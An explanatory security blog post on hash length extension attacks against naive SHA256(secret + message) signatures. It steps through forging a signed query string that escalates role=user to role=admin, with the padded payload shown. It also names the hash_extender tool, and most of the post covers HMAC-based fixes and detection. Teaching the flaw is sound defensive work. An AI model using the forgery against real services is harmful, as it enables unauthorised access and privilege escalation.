Hash Length Extension Attack: How to Forge a MAC Without the Secret

Hash Length Extension Attack: How to Forge a MAC Without the Secret

Written by

in

You built a tiny security check. Take a secret key, stick the message after it, hash the whole thing, and send that hash as a signature. If someone tampers with the message, the hash will not match, so you are safe. That feeling of safety is wrong. A hash length extension attack lets an attacker take your signature and the message, append their own data, and produce a valid signature for the longer message, all without ever learning the secret key.

The broken pattern: a MAC built as H(secret || message)

A message authentication code, or MAC, proves two things at once. The message has not changed, and it came from someone who holds the secret. The naive way to build one is to glue the secret in front of the message and hash it:

sig = SHA256(secret + message)

The server knows the secret, recomputes SHA256(secret + message) on each request, and checks the sig matches. Looks reasonable. The secret is never sent, an attacker cannot guess it, and any edit to the message changes the hash. The problem is not the secret. It is how SHA256, SHA1, and MD5 are built on the inside.

Merkle Damgard: why the digest is resumable state

MD5, SHA1, and SHA256 all share a design called the Merkle Damgard construction, named after its two inventors. It works in three steps.

  • Pad the input. The hash works on fixed size blocks, 64 bytes for these functions. A padding tail is added so the total length is a clean multiple of the block size: a single 0x80 byte, then zero bytes, then the original message length encoded as a number at the very end.
  • Process block by block. Start with a fixed initial state. Mix in the first block, then mix the next block into the updated state, and keep going until every block is consumed.
  • Output the state. When the last block is done, the internal state IS the final hash. The digest you print as hex is a direct copy of the machine’s internal registers.

Read that last point again, because it is the whole attack. The output is not a one way summary of the state. It is the state. Nothing is hidden or thrown away on the way out.

The digest is not a fingerprint of the internal state. It is the internal state, copied straight out. So whoever holds the digest can sit down at the machine and keep hashing from exactly where it stopped.

How a hash length extension attack actually works

Imagine the server signs API requests with SHA256(secret + message). You intercept one, so you have the message and the signature but not the secret. Here is what you can do anyway.

The signature you hold is the internal state of the hash right after it processed secret + message + padding. Load that state into your own SHA256 engine, resume hashing as if it never stopped, and feed it any extra bytes you want. The new output is a valid hash of secret + message + padding + extra, produced without the secret.

A concrete example: from user to admin

Say the signed request is a query string. The server hashed the secret plus the part after the question mark.

?user=bob&role=user&sig=2f1a...c9

You want to add &role=admin and still have a valid sig. You do not know the secret, but you can guess its length and try each likely value in turn. For one guess, the steps are:

  • Load the known sig value as the resumable state of a fresh SHA256.
  • Work out the padding the hash would have added after secret + "user=bob&role=user". That depends only on the total length, which is the secret length guess plus the known message length.
  • Resume the hash, feed it your extra data &role=admin, and read out the new digest. That is your forged signature.

The message you send is the original bytes, then the glue padding, then your extra data:

user=bob&role=user\x80\x00\x00...[length bits]...&role=admin

When the server computes SHA256(secret + that_whole_thing), it lands on the exact state you predicted, so your forged sig matches. Most query string and form parsers ignore the padding bytes or treat duplicate keys as last value wins, so the server reads role=admin and you are now an admin. You never saw the secret. You only needed the original hash and a guess at the secret length, which you can brute force from 1 to maybe 64 in under a second. A tool called hash_extender does the whole computation for you.

Why this breaks naive secret prefix MACs but not encryption

The attack does not decrypt anything and does not reveal the secret. It just continues a computation. That narrow ability is enough, because the only thing standing between an attacker and a valid signature is the ability to compute the final hash, and the published hash hands them the starting point for free.

It is the same family of mistake as trusting a value you do not fully control. A padding oracle attack turns a small leak about padding into full plaintext recovery, and a JWT algorithm confusion attack tricks a verifier into accepting a token signed the wrong way. All three share a root: a design assumed an attacker could not do one thing, and the construction quietly let them do it.

The fix: use HMAC, or a hash that resists this

The good news is that this is a solved problem.

  • Use HMAC. HMAC wraps the hash in two keyed passes, roughly H(key2 + H(key1 + message)). The outer hash hides the inner state, so the published value is no longer a resumable state of secret + message. Length extension does not work against it. Reach for HMAC over SHA256 and your existing SHA256 is safe to use.
  • Or use a hash that is not Merkle Damgard. SHA3 uses a sponge construction and BLAKE2 has built in keying. Neither exposes a resumable internal state in the output, so H(secret + message) with these is not vulnerable to this attack. HMAC is still the more standard choice for a MAC.
  • Never roll your own keyed hash. SHA256(secret + message) looks obviously fine and is obviously broken. Stop hand building MAC schemes from raw hash functions and call the HMAC function your language already ships.

If you inherit code that signs with a bare hash(secret + data), treat it as a finding, not a style nitpick. Swapping it to HMAC is a small change with a large payoff.

How to spot it in a real app

You rarely see the words “length extension” in a codebase. You see the shape that allows it:

  • A signature computed as md5(secret . data), sha1(key + payload), or any concatenation of a key and a message fed straight into a plain hash.
  • An API that accepts a sig field and verifies it by recomputing a hash over a secret and request data.
  • Parameters where the last duplicate key wins, which lets an appended &role=admin override the real value cleanly.

A scanner looking for known bad strings walks right past sha256(secret + message), because there is no payload to match. The bug is in the design assumption, not in any one line. Catching it means understanding what the code is trying to prove and asking whether the math actually proves it. That is the kind of reasoning an autonomous researcher that tests assumptions is built for. In our own early work a frontier model drove the full methodology on its own and identified and verified real access control and injection issues in test applications it had not seen before, an encouraging early signal rather than a benchmark. For the wider approach, read more on our about page.

Frequently asked questions

What is a hash length extension attack?

It is an attack against signatures built as a plain hash of a secret followed by a message, like SHA256(secret + message). Because hashes such as MD5, SHA1, and SHA256 use the Merkle Damgard construction, their output is the resumable internal state of the hash. An attacker who knows the original hash and the length of the secret can resume the computation and append extra data, producing a valid hash for the longer message without ever learning the secret.

Which hash functions are vulnerable?

The Merkle Damgard hashes are vulnerable: MD5, SHA1, SHA256, and SHA512 all expose their full internal state in the digest. SHA-3 uses a sponge construction and BLAKE2 has built in keying, so neither leaks a resumable state and neither is vulnerable to this attack. The vulnerability is in how the bare hash is used as a MAC, not only in the hash itself.

Does the attacker need to know the secret?

No. That is what makes the attack work. The attacker needs the original message, the original hash, and the length of the secret. The secret length can be brute forced by trying each value from 1 to about 64, since each guess produces a candidate forgery to test. The secret itself is never recovered and never needs to be.

How do you fix a hash length extension attack?

Use HMAC instead of a hand built keyed hash. HMAC wraps the hash in two keyed passes, so the published value is no longer a resumable internal state and length extension fails. Reach for HMAC-SHA256 from your standard library. You can also use SHA-3 or BLAKE2, which are not vulnerable, but the main rule is to never roll your own MAC as hash(secret + message).